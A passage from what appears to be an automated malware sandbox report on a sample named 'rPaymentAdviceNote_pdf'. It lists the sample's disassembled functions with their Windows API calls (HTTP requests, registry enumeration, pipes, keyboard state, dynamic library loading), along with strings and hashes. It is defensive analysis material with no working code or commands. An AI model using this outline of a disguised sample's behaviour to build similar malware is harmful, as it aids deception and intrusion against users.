                                                              • Opcode Fuzzy Hash: 5c9b35f0b18338d53d41984e601c570fa774fd9e0f21959aa7a96e18deec77e1
                                                              • Instruction Fuzzy Hash: 74316E71904619ABCF00EFA8C8519FEB7B5FF14720B108A29E965D77D2EB71A905CB80
                                                              Function 00898E90 Relevance: 8.8, APIs: 3, Strings: 2, Instructions: 94windowCOMMON
                                                              Download Yara Rule
                                                              APIs
                                                                • Part of subcall function 00847DE1: _memmove.LIBCMT ref: 00847E22
                                                                • Part of subcall function 0089AA99: GetClassNameW.USER32(?,?,000000FF), ref: 0089AABC
                                                              • SendMessageW.USER32(?,00000188,00000000,00000000), ref: 00898F14
                                                              • SendMessageW.USER32(?,0000018A,00000000,00000000), ref: 00898F27
                                                              • SendMessageW.USER32(?,00000189,?,00000000), ref: 00898F57
                                                                • Part of subcall function 00847BCC: _memmove.LIBCMT ref: 00847C06
                                                              Strings
                                                              Memory Dump Source
                                                              • Source File: 00000000.00000002.1281243917.0000000000841000.00000020.00000001.01000000.00000003.sdmp, Offset: 00840000, based on PE: true
                                                              • Associated: 00000000.00000002.1281224169.0000000000840000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                              • Associated: 00000000.00000002.1281291899.00000000008CF000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                              • Associated: 00000000.00000002.1281291899.00000000008F4000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                              • Associated: 00000000.00000002.1281335693.00000000008FE000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                              • Associated: 00000000.00000002.1281351794.0000000000907000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                              Joe Sandbox IDA Plugin
                                                              • Snapshot File: hcaresult_0_2_840000_rPaymentAdviceNote_pdf.jbxd
                                                              Similarity
                                                              • API ID: MessageSend$_memmove$ClassName
                                                              • String ID: ComboBox$ListBox
                                                              • API String ID: 365058703-1403004172
                                                              • Opcode ID: c19467d33c0127423480f58f849b1f8ab448e04196a63fbdd6afe410b9a632f0
                                                              • Instruction ID: cdf24815fc4255f4ad30e6fb348e80ed16dac0444b9a2411a71024381e409a5e
                                                              • Opcode Fuzzy Hash: c19467d33c0127423480f58f849b1f8ab448e04196a63fbdd6afe410b9a632f0
                                                              • Instruction Fuzzy Hash: 6921E171A00109BEEF14ABB48C45DFFBB69FF06360B084529F421E72E1DF394809D610
                                                              Function 008B182D Relevance: 8.8, APIs: 4, Strings: 1, Instructions: 86networkCOMMON
                                                              Download Yara Rule
                                                              APIs
                                                              • InternetOpenUrlW.WININET(?,?,00000000,00000000,?,00000000), ref: 008B184C
                                                              • HttpSendRequestW.WININET(00000000,00000000,00000000,00000000,00000000), ref: 008B1872
                                                              • HttpQueryInfoW.WININET(00000000,00000005,?,?,?), ref: 008B18A2
                                                              • InternetCloseHandle.WININET(00000000), ref: 008B18E9
                                                                • Part of subcall function 008B2483: GetLastError.KERNEL32(?,?,008B1817,00000000,00000000,00000001), ref: 008B2498
                                                                • Part of subcall function 008B2483: SetEvent.KERNEL32(?,?,008B1817,00000000,00000000,00000001), ref: 008B24AD
                                                              Strings
                                                              Memory Dump Source
                                                              • Source File: 00000000.00000002.1281243917.0000000000841000.00000020.00000001.01000000.00000003.sdmp, Offset: 00840000, based on PE: true
                                                              • Associated: 00000000.00000002.1281224169.0000000000840000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                              • Associated: 00000000.00000002.1281291899.00000000008CF000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                              • Associated: 00000000.00000002.1281291899.00000000008F4000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                              • Associated: 00000000.00000002.1281335693.00000000008FE000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                              • Associated: 00000000.00000002.1281351794.0000000000907000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                              Joe Sandbox IDA Plugin
                                                              • Snapshot File: hcaresult_0_2_840000_rPaymentAdviceNote_pdf.jbxd
                                                              Similarity
                                                              • API ID: HttpInternet$CloseErrorEventHandleInfoLastOpenQueryRequestSend
                                                              • String ID:
                                                              • API String ID: 3113390036-3916222277
                                                              • Opcode ID: 57f3d36c2c11156999d0627a2e7fd84dd278444331541c88b7ca4ffd5ac17ae5
                                                              • Instruction ID: 368f81777b963d98abbd2c73ef4bae46dcf19613b66a8f32c3d00060f6aa49c6
                                                              • Opcode Fuzzy Hash: 57f3d36c2c11156999d0627a2e7fd84dd278444331541c88b7ca4ffd5ac17ae5
                                                              • Instruction Fuzzy Hash: E2217CB1500208BFEB219B649C99EFB76AEFB48744F50413AF905EA640EA309E0597A1
                                                              Function 008C63E7 Relevance: 8.8, APIs: 4, Strings: 1, Instructions: 80windowlibraryCOMMON
                                                              Download Yara Rule
                                                              APIs
                                                                • Part of subcall function 00841D35: CreateWindowExW.USER32(?,?,?,?,?,?,?,?,?,?,00000000,00000096), ref: 00841D73
                                                                • Part of subcall function 00841D35: GetStockObject.GDI32(00000011), ref: 00841D87
                                                                • Part of subcall function 00841D35: SendMessageW.USER32(00000000,00000030,00000000), ref: 00841D91
                                                              • SendMessageW.USER32(00000000,00000467,00000000,?), ref: 008C6461
                                                              • LoadLibraryW.KERNEL32(?), ref: 008C6468
                                                              • SendMessageW.USER32(?,00000467,00000000,00000000), ref: 008C647D
                                                              • DestroyWindow.USER32(?), ref: 008C6485
                                                              Strings
                                                              Memory Dump Source
                                                              • Source File: 00000000.00000002.1281243917.0000000000841000.00000020.00000001.01000000.00000003.sdmp, Offset: 00840000, based on PE: true
                                                              • Associated: 00000000.00000002.1281224169.0000000000840000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                              • Associated: 00000000.00000002.1281291899.00000000008CF000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                              • Associated: 00000000.00000002.1281291899.00000000008F4000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                              • Associated: 00000000.00000002.1281335693.00000000008FE000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                              • Associated: 00000000.00000002.1281351794.0000000000907000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                              Joe Sandbox IDA Plugin
                                                              • Snapshot File: hcaresult_0_2_840000_rPaymentAdviceNote_pdf.jbxd
                                                              Similarity
                                                              • API ID: MessageSend$Window$CreateDestroyLibraryLoadObjectStock
                                                              • String ID: SysAnimate32
                                                              • API String ID: 4146253029-1011021900
                                                              • Opcode ID: 52ed864028ad89bbf368f0a8a5ca3692ff959d2dab06145831dd4cf30aa4de52
                                                              • Instruction ID: 9290f2ed88d23bce5de01eb4342f83674c31baaa10aaeec74384aeb2f4cb0138
                                                              • Opcode Fuzzy Hash: 52ed864028ad89bbf368f0a8a5ca3692ff959d2dab06145831dd4cf30aa4de52
                                                              • Instruction Fuzzy Hash: 81217971200209ABEF148F64DC84FBA37BDFF58328F104639FA10D2191E631DC61A764
                                                              Function 008A6D9C Relevance: 8.8, APIs: 4, Strings: 1, Instructions: 79filepipeCOMMON
                                                              Download Yara Rule
                                                              APIs
                                                              • GetStdHandle.KERNEL32(0000000C), ref: 008A6DBC
                                                              • CreatePipe.KERNEL32(?,?,0000000C,00000000), ref: 008A6DEF
                                                              • GetStdHandle.KERNEL32(0000000C), ref: 008A6E01
                                                              • CreateFileW.KERNEL32(nul,40000000,00000002,0000000C,00000003,00000080,00000000), ref: 008A6E3B
                                                              Strings
                                                              Memory Dump Source
                                                              • Source File: 00000000.00000002.1281243917.0000000000841000.00000020.00000001.01000000.00000003.sdmp, Offset: 00840000, based on PE: true
                                                              • Associated: 00000000.00000002.1281224169.0000000000840000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                              • Associated: 00000000.00000002.1281291899.00000000008CF000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                              • Associated: 00000000.00000002.1281291899.00000000008F4000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                              • Associated: 00000000.00000002.1281335693.00000000008FE000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                              • Associated: 00000000.00000002.1281351794.0000000000907000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                              Joe Sandbox IDA Plugin
                                                              • Snapshot File: hcaresult_0_2_840000_rPaymentAdviceNote_pdf.jbxd
                                                              Similarity
                                                              • API ID: CreateHandle$FilePipe
                                                              • String ID: nul
                                                              • API String ID: 4209266947-2873401336
                                                              • Opcode ID: 498d76c88161d4a0b970fe8e509ca351b1b3fe1c306d7e8e2cc7d8873973ac25
                                                              • Instruction ID: 10cc8a374531916fc86ecd7d20efeaa5c42161b284ad82483a3094043a7d9051
                                                              • Opcode Fuzzy Hash: 498d76c88161d4a0b970fe8e509ca351b1b3fe1c306d7e8e2cc7d8873973ac25
                                                              • Instruction Fuzzy Hash: 8D21A474600209ABEB209F39DC04A9A77F5FF46760F244619FEA0D76D4E7719970CB50
                                                              Function 008A6E6A Relevance: 8.8, APIs: 4, Strings: 1, Instructions: 79filepipeCOMMON
                                                              Download Yara Rule
                                                              APIs
                                                              • GetStdHandle.KERNEL32(000000F6), ref: 008A6E89
                                                              • CreatePipe.KERNEL32(?,?,0000000C,00000000), ref: 008A6EBB
                                                              • GetStdHandle.KERNEL32(000000F6), ref: 008A6ECC
                                                              • CreateFileW.KERNEL32(nul,80000000,00000001,0000000C,00000003,00000080,00000000), ref: 008A6F06
                                                              Strings
                                                              Memory Dump Source
                                                              • Source File: 00000000.00000002.1281243917.0000000000841000.00000020.00000001.01000000.00000003.sdmp, Offset: 00840000, based on PE: true
                                                              • Associated: 00000000.00000002.1281224169.0000000000840000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                              • Associated: 00000000.00000002.1281291899.00000000008CF000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                              • Associated: 00000000.00000002.1281291899.00000000008F4000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                              • Associated: 00000000.00000002.1281335693.00000000008FE000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                              • Associated: 00000000.00000002.1281351794.0000000000907000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                              Joe Sandbox IDA Plugin
                                                              • Snapshot File: hcaresult_0_2_840000_rPaymentAdviceNote_pdf.jbxd
                                                              Similarity
                                                              • API ID: CreateHandle$FilePipe
                                                              • String ID: nul
                                                              • API String ID: 4209266947-2873401336
                                                              • Opcode ID: c6d8c00697046872a6af4f97f990b918bc6acb11af4d308d24d61acd231a19c6
                                                              • Instruction ID: db97613ad7e94e168489b1cf35e57f0f2c399bf7d3ac97fcab95893bcdd87e50
                                                              • Opcode Fuzzy Hash: c6d8c00697046872a6af4f97f990b918bc6acb11af4d308d24d61acd231a19c6
                                                              • Instruction Fuzzy Hash: 06218179500305EBEB209F69D804A9AB7A8FF46724F380A19F9A0D76D4E77098708761
                                                              Function 008AAC40 Relevance: 8.8, APIs: 4, Strings: 1, Instructions: 73COMMON
                                                              Download Yara Rule
                                                              APIs
                                                              • SetErrorMode.KERNEL32(00000001), ref: 008AAC54
                                                              • GetVolumeInformationW.KERNEL32(?,?,00007FFF,?,00000000,00000000,00000000,00000000), ref: 008AACA8
                                                              • __swprintf.LIBCMT ref: 008AACC1
                                                              • SetErrorMode.KERNEL32(00000000,00000001,00000000,008CF910), ref: 008AACFF
                                                              Strings
                                                              Memory Dump Source
                                                              • Source File: 00000000.00000002.1281243917.0000000000841000.00000020.00000001.01000000.00000003.sdmp, Offset: 00840000, based on PE: true
                                                              • Associated: 00000000.00000002.1281224169.0000000000840000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                              • Associated: 00000000.00000002.1281291899.00000000008CF000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                              • Associated: 00000000.00000002.1281291899.00000000008F4000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                              • Associated: 00000000.00000002.1281335693.00000000008FE000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                              • Associated: 00000000.00000002.1281351794.0000000000907000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                              Joe Sandbox IDA Plugin
                                                              • Snapshot File: hcaresult_0_2_840000_rPaymentAdviceNote_pdf.jbxd
                                                              Similarity
                                                              • API ID: ErrorMode$InformationVolume__swprintf
                                                              • String ID: %lu
                                                              • API String ID: 3164766367-685833217
                                                              • Opcode ID: dee840ec1081f5b15c803ea7712fb7f607867448aaa84e44c88fd1f9608fc7f7
                                                              • Instruction ID: 870bbfa04497d30a8cff13ea4d15cdebe9689b574fa8d5d21ea729ebeae91a5b
                                                              • Opcode Fuzzy Hash: dee840ec1081f5b15c803ea7712fb7f607867448aaa84e44c88fd1f9608fc7f7
                                                              • Instruction Fuzzy Hash: 65216030A0010DAFDB10DF69C945DAE7BB8FF49714B004469F909EB352DB31EA41CB22
                                                              Function 008A1AE8 Relevance: 8.8, APIs: 1, Strings: 4, Instructions: 49COMMON
                                                              Download Yara Rule
                                                              APIs
                                                              • CharUpperBuffW.USER32(?,?), ref: 008A1B19
                                                              Strings
                                                              Memory Dump Source
                                                              • Source File: 00000000.00000002.1281243917.0000000000841000.00000020.00000001.01000000.00000003.sdmp, Offset: 00840000, based on PE: true
                                                              • Associated: 00000000.00000002.1281224169.0000000000840000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                              • Associated: 00000000.00000002.1281291899.00000000008CF000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                              • Associated: 00000000.00000002.1281291899.00000000008F4000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                              • Associated: 00000000.00000002.1281335693.00000000008FE000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                              • Associated: 00000000.00000002.1281351794.0000000000907000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                              Joe Sandbox IDA Plugin
                                                              • Snapshot File: hcaresult_0_2_840000_rPaymentAdviceNote_pdf.jbxd
                                                              Similarity
                                                              • API ID: BuffCharUpper
                                                              • String ID: APPEND$EXISTS$KEYS$REMOVE
                                                              • API String ID: 3964851224-769500911
                                                              • Opcode ID: d29c6ebda95cdd9d4ec7431c0c07f06855e2241a92c71d9040746923e5b88c5a
                                                              • Instruction ID: 55b1694c859ab9f79a3ca1e03d8d37dd212c7dd07c9e8f124de028bb76d507aa
                                                              • Opcode Fuzzy Hash: d29c6ebda95cdd9d4ec7431c0c07f06855e2241a92c71d9040746923e5b88c5a
                                                              • Instruction Fuzzy Hash: 5C117C709001188FCF00EFA8D8558BEB7B5FF26304F104465D964E76A2EB32590ACF50
                                                              Function 008BEB55 Relevance: 7.7, APIs: 5, Instructions: 247COMMON
                                                              Download Yara Rule
                                                              APIs
                                                              • OpenProcess.KERNEL32(00000410,00000000,00000000), ref: 008BEC07
                                                              • GetProcessIoCounters.KERNEL32(00000000,?), ref: 008BEC37
                                                              • GetProcessMemoryInfo.PSAPI(00000000,?,00000028), ref: 008BED6A
                                                              • CloseHandle.KERNEL32(?), ref: 008BEDEB
                                                              Memory Dump Source
                                                              • Source File: 00000000.00000002.1281243917.0000000000841000.00000020.00000001.01000000.00000003.sdmp, Offset: 00840000, based on PE: true
                                                              • Associated: 00000000.00000002.1281224169.0000000000840000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                              • Associated: 00000000.00000002.1281291899.00000000008CF000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                              • Associated: 00000000.00000002.1281291899.00000000008F4000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                              • Associated: 00000000.00000002.1281335693.00000000008FE000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                              • Associated: 00000000.00000002.1281351794.0000000000907000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                              Joe Sandbox IDA Plugin
                                                              • Snapshot File: hcaresult_0_2_840000_rPaymentAdviceNote_pdf.jbxd
                                                              Similarity
                                                              • API ID: Process$CloseCountersHandleInfoMemoryOpen
                                                              • String ID:
                                                              • API String ID: 2364364464-0
                                                              • Opcode ID: f04a7c8a926d66a98f9638ab005c16c5a347acf8a07e3a572047364f2a63bd45
                                                              • Instruction ID: c5e5b8ad81b2382442d1d7388d76e42b5855be186759de863496342e1757b160
                                                              • Opcode Fuzzy Hash: f04a7c8a926d66a98f9638ab005c16c5a347acf8a07e3a572047364f2a63bd45
                                                              • Instruction Fuzzy Hash: 15812C716047109FD760EF2CC886B6AB7E5FF44720F14892DF999DB392D6B1AC408B92
                                                              Function 0086541D Relevance: 7.7, APIs: 5, Instructions: 163COMMONLIBRARYCODE
                                                              Download Yara Rule
                                                              APIs
                                                              Memory Dump Source
                                                              • Source File: 00000000.00000002.1281243917.0000000000841000.00000020.00000001.01000000.00000003.sdmp, Offset: 00840000, based on PE: true
                                                              • Associated: 00000000.00000002.1281224169.0000000000840000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                              • Associated: 00000000.00000002.1281291899.00000000008CF000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                              • Associated: 00000000.00000002.1281291899.00000000008F4000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                              • Associated: 00000000.00000002.1281335693.00000000008FE000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                              • Associated: 00000000.00000002.1281351794.0000000000907000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                              Joe Sandbox IDA Plugin
                                                              • Snapshot File: hcaresult_0_2_840000_rPaymentAdviceNote_pdf.jbxd
                                                              Similarity
                                                              • API ID: _memset$__filbuf__getptd_noexit__read_nolock_memcpy_s
                                                              • String ID:
                                                              • API String ID: 1559183368-0
                                                              • Opcode ID: 1d92f2bce51b0a0de234b56dfad0c5d103c922ba67c2ed527f53aae8e5802bd0
                                                              • Instruction ID: fc5e9589622005f3e27cb2e0344677f34adcaed12d685c6d462084afced34a8b
                                                              • Opcode Fuzzy Hash: 1d92f2bce51b0a0de234b56dfad0c5d103c922ba67c2ed527f53aae8e5802bd0
                                                              • Instruction Fuzzy Hash: 5A51D670A00B09DBCB248F69D88966E77A2FF40335F258769F836D62D0DB71DD908B45
                                                              Function 008C0037 Relevance: 7.6, APIs: 5, Instructions: 144registryCOMMON
                                                              Download Yara Rule
                                                              APIs
                                                                • Part of subcall function 00847DE1: _memmove.LIBCMT ref: 00847E22
                                                                • Part of subcall function 008C0E1A: CharUpperBuffW.USER32(?,?,?,?,?,?,?,008BFDAD,?,?), ref: 008C0E31
                                                              • RegConnectRegistryW.ADVAPI32(?,?,?), ref: 008C00FD
                                                              • RegOpenKeyExW.ADVAPI32(?,?,00000000,?,?), ref: 008C013C
                                                              • RegEnumKeyExW.ADVAPI32(?,-00000001,?,?,00000000,00000000,00000000,?), ref: 008C0183
                                                              • RegCloseKey.ADVAPI32(?,?), ref: 008C01AF
                                                              • RegCloseKey.ADVAPI32(00000000), ref: 008C01BC
                                                              Memory Dump Source
                                                              • Source File: 00000000.00000002.1281243917.0000000000841000.00000020.00000001.01000000.00000003.sdmp, Offset: 00840000, based on PE: true
                                                              • Associated: 00000000.00000002.1281224169.0000000000840000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                              • Associated: 00000000.00000002.1281291899.00000000008CF000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                              • Associated: 00000000.00000002.1281291899.00000000008F4000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                              • Associated: 00000000.00000002.1281335693.00000000008FE000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                              • Associated: 00000000.00000002.1281351794.0000000000907000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                              Joe Sandbox IDA Plugin
                                                              • Snapshot File: hcaresult_0_2_840000_rPaymentAdviceNote_pdf.jbxd
                                                              Similarity
                                                              • API ID: Close$BuffCharConnectEnumOpenRegistryUpper_memmove
                                                              • String ID:
                                                              • API String ID: 3440857362-0
                                                              • Opcode ID: b9a0cfeaca609ba0d616c2733fb3b2abc81b31f06bd07403b25ec7d496a67162
                                                              • Instruction ID: 6e02fd3d2e1c235135368bb9e5becc2ccec2e10146e68fc266b270bd696f9166
                                                              • Opcode Fuzzy Hash: b9a0cfeaca609ba0d616c2733fb3b2abc81b31f06bd07403b25ec7d496a67162
                                                              • Instruction Fuzzy Hash: 24511771208208AFD714EB58C881F6AB7F9FF84754F44892DF595C72A2EB31E904CB52
                                                              Function 008BD8C8 Relevance: 7.6, APIs: 5, Instructions: 139libraryloaderCOMMON
                                                              Download Yara Rule
                                                              APIs
                                                                • Part of subcall function 00849837: __itow.LIBCMT ref: 00849862
                                                                • Part of subcall function 00849837: __swprintf.LIBCMT ref: 008498AC
                                                              • LoadLibraryW.KERNEL32(?,?,?,00000000,?,?,?,?,?,?,?,?), ref: 008BD927
                                                              • GetProcAddress.KERNEL32(00000000,?), ref: 008BD9AA
                                                              • GetProcAddress.KERNEL32(00000000,00000000), ref: 008BD9C6
                                                              • GetProcAddress.KERNEL32(00000000,?), ref: 008BDA07
                                                              • FreeLibrary.KERNEL32(00000000,?,?,00000000,?,?,?,?,?,?,?,?), ref: 008BDA21
                                                                • Part of subcall function 00845A15: WideCharToMultiByte.KERNEL32(00000000,00000000,?,00000001,00000000,00000000,00000000,00000000,00000000,00000000,?,008A7896,?,?,00000000), ref: 00845A2C
                                                                • Part of subcall function 00845A15: WideCharToMultiByte.KERNEL32(00000000,00000000,?,00000001,00000000,?,00000000,00000000,?,?,008A7896,?,?,00000000,?,?), ref: 00845A50
                                                              Memory Dump Source
                                                              • Source File: 00000000.00000002.1281243917.0000000000841000.00000020.00000001.01000000.00000003.sdmp, Offset: 00840000, based on PE: true
                                                              • Associated: 00000000.00000002.1281224169.0000000000840000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                              • Associated: 00000000.00000002.1281291899.00000000008CF000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                              • Associated: 00000000.00000002.1281291899.00000000008F4000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                              • Associated: 00000000.00000002.1281335693.00000000008FE000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                              • Associated: 00000000.00000002.1281351794.0000000000907000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                              Joe Sandbox IDA Plugin
                                                              • Snapshot File: hcaresult_0_2_840000_rPaymentAdviceNote_pdf.jbxd
                                                              Similarity
                                                              • API ID: AddressProc$ByteCharLibraryMultiWide$FreeLoad__itow__swprintf
                                                              • String ID:
                                                              • API String ID: 327935632-0
                                                              • Opcode ID: d46df4dca2355ccb315de48567d19aa4efa20b823593e7d33cf5e58ceb64331f
                                                              • Instruction ID: 33fad2077947842605c1f6c697a631550dcd9782199900fbc26a6d955e52a438
                                                              • Opcode Fuzzy Hash: d46df4dca2355ccb315de48567d19aa4efa20b823593e7d33cf5e58ceb64331f
                                                              • Instruction Fuzzy Hash: BB511635A00219EFCB11EFA8C4849ADBBF5FF09324B148066E959EB312E731AD45CF91
                                                              Function 008AE571 Relevance: 7.6, APIs: 5, Instructions: 135COMMON
                                                              Download Yara Rule
                                                              APIs
                                                              • GetPrivateProfileSectionW.KERNEL32(00000003,?,00007FFF,?), ref: 008AE61F
                                                              • GetPrivateProfileSectionW.KERNEL32(?,00000001,00000003,?), ref: 008AE648
                                                              • WritePrivateProfileSectionW.KERNEL32(?,?,?), ref: 008AE687
                                                                • Part of subcall function 00849837: __itow.LIBCMT ref: 00849862
                                                                • Part of subcall function 00849837: __swprintf.LIBCMT ref: 008498AC
                                                              • WritePrivateProfileStringW.KERNEL32(00000003,00000000,00000000,?), ref: 008AE6AC
                                                              • WritePrivateProfileStringW.KERNEL32(00000000,00000000,00000000,?), ref: 008AE6B4
                                                              Memory Dump Source
                                                              • Source File: 00000000.00000002.1281243917.0000000000841000.00000020.00000001.01000000.00000003.sdmp, Offset: 00840000, based on PE: true
                                                              • Associated: 00000000.00000002.1281224169.0000000000840000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                              • Associated: 00000000.00000002.1281291899.00000000008CF000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                              • Associated: 00000000.00000002.1281291899.00000000008F4000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                              • Associated: 00000000.00000002.1281335693.00000000008FE000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                              • Associated: 00000000.00000002.1281351794.0000000000907000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                              Joe Sandbox IDA Plugin
                                                              • Snapshot File: hcaresult_0_2_840000_rPaymentAdviceNote_pdf.jbxd
                                                              Similarity
                                                              • API ID: PrivateProfile$SectionWrite$String$__itow__swprintf
                                                              • String ID:
                                                              • API String ID: 1389676194-0
                                                              • Opcode ID: 6302d0fa2c8b7421476d0b1314a13d305828baeda79e4999552e3f9374649552
                                                              • Instruction ID: 0188573f798bbf5e68e25f7afccc48cb6666bbac54f0a0bd33a5c380a361320e
                                                              • Opcode Fuzzy Hash: 6302d0fa2c8b7421476d0b1314a13d305828baeda79e4999552e3f9374649552
                                                              • Instruction Fuzzy Hash: B1511835A00109DFDB11EF68C981AAEBBF5FF49314B1484A9E949EB362CB31ED11CB51
                                                              Function 008CA056 Relevance: 7.6, APIs: 5, Instructions: 130COMMON
                                                              Download Yara Rule
                                                              Memory Dump Source
                                                              • Source File: 00000000.00000002.1281243917.0000000000841000.00000020.00000001.01000000.00000003.sdmp, Offset: 00840000, based on PE: true
                                                              • Associated: 00000000.00000002.1281224169.0000000000840000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                              • Associated: 00000000.00000002.1281291899.00000000008CF000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                              • Associated: 00000000.00000002.1281291899.00000000008F4000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                              • Associated: 00000000.00000002.1281335693.00000000008FE000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                              • Associated: 00000000.00000002.1281351794.0000000000907000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                              Joe Sandbox IDA Plugin
                                                              • Snapshot File: hcaresult_0_2_840000_rPaymentAdviceNote_pdf.jbxd
                                                              Similarity
                                                              • API ID:
                                                              • String ID:
                                                              • API String ID:
                                                              • Opcode ID: 4b854e73b2d3b8636c9e2b31301038af7be7950101795d1994efee96d236b230
                                                              • Instruction ID: 2b10d5e3cb1ebcacec7993d49e6dc5bbdf9853c99931f4b0bc5eb6ba6aa7f18f
                                                              • Opcode Fuzzy Hash: 4b854e73b2d3b8636c9e2b31301038af7be7950101795d1994efee96d236b230
                                                              • Instruction Fuzzy Hash: C041023590410CAFD728CB28DC88FA9BBB9FB09318F19416AF916E72E1CB30DD40DA51
                                                              Function 00842344 Relevance: 7.6, APIs: 5, Instructions: 111keyboardCOMMON
                                                              Download Yara Rule
                                                              APIs
                                                              • GetCursorPos.USER32(?), ref: 00842357
                                                              • ScreenToClient.USER32(009057B0,?), ref: 00842374
                                                              • GetAsyncKeyState.USER32(00000001), ref: 00842399
                                                              • GetAsyncKeyState.USER32(00000002), ref: 008423A7
                                                              Memory Dump Source
                                                              • Source File: 00000000.00000002.1281243917.0000000000841000.00000020.00000001.01000000.00000003.sdmp, Offset: 00840000, based on PE: true
                                                              • Associated: 00000000.00000002.1281224169.0000000000840000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                              • Associated: 00000000.00000002.1281291899.00000000008CF000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                              • Associated: 00000000.00000002.1281291899.00000000008F4000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                              • Associated: 00000000.00000002.1281335693.00000000008FE000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                              • Associated: 00000000.00000002.1281351794.0000000000907000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                              Joe Sandbox IDA Plugin
                                                              • Snapshot File: hcaresult_0_2_840000_rPaymentAdviceNote_pdf.jbxd
                                                              Similarity
                                                              • API ID: AsyncState$ClientCursorScreen
                                                              • String ID:
                                                              • API String ID: 4210589936-0
                                                              • Opcode ID: ccc5a33600f9fcfdaa557486f1cabb8ee34e4534fb966f3893eec5446659b29c
                                                              • Instruction ID: 640fe880eb2b8a176c6909d4b692222d64b4c5e5906d3200f13c245e586efa16
                                                              • Opcode Fuzzy Hash: ccc5a33600f9fcfdaa557486f1cabb8ee34e4534fb966f3893eec5446659b29c
                                                              • Instruction Fuzzy Hash: 5E419135608509FBDF159F68C844FE9BB75FB05364F20836AF828D62A0CB349990DF91
                                                              Function 008963AA Relevance: 7.6, APIs: 5, Instructions: 97windowCOMMON
                                                              Download Yara Rule
                                                              APIs
                                                              • PeekMessageW.USER32(?,00000000,00000000,00000000,00000001), ref: 008963E7
                                                              • TranslateAcceleratorW.USER32(?,?,?), ref: 00896433
                                                              • TranslateMessage.USER32(?), ref: 0089645C
                                                              • DispatchMessageW.USER32(?), ref: 00896466
                                                              • PeekMessageW.USER32(?,00000000,00000000,00000000,00000001), ref: 00896475
                                                              Memory Dump Source
                                                              • Source File: 00000000.00000002.1281243917.0000000000841000.00000020.00000001.01000000.00000003.sdmp, Offset: 00840000, based on PE: true
                                                              • Associated: 00000000.00000002.1281224169.0000000000840000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                              • Associated: 00000000.00000002.1281291899.00000000008CF000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                              • Associated: 00000000.00000002.1281291899.00000000008F4000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                              • Associated: 00000000.00000002.1281335693.00000000008FE000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                              • Associated: 00000000.00000002.1281351794.0000000000907000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                              Joe Sandbox IDA Plugin
                                                              • Snapshot File: hcaresult_0_2_840000_rPaymentAdviceNote_pdf.jbxd
                                                              Similarity
                                                              • API ID: Message$PeekTranslate$AcceleratorDispatch
                                                              • String ID:
                                                              • API String ID: 2108273632-0
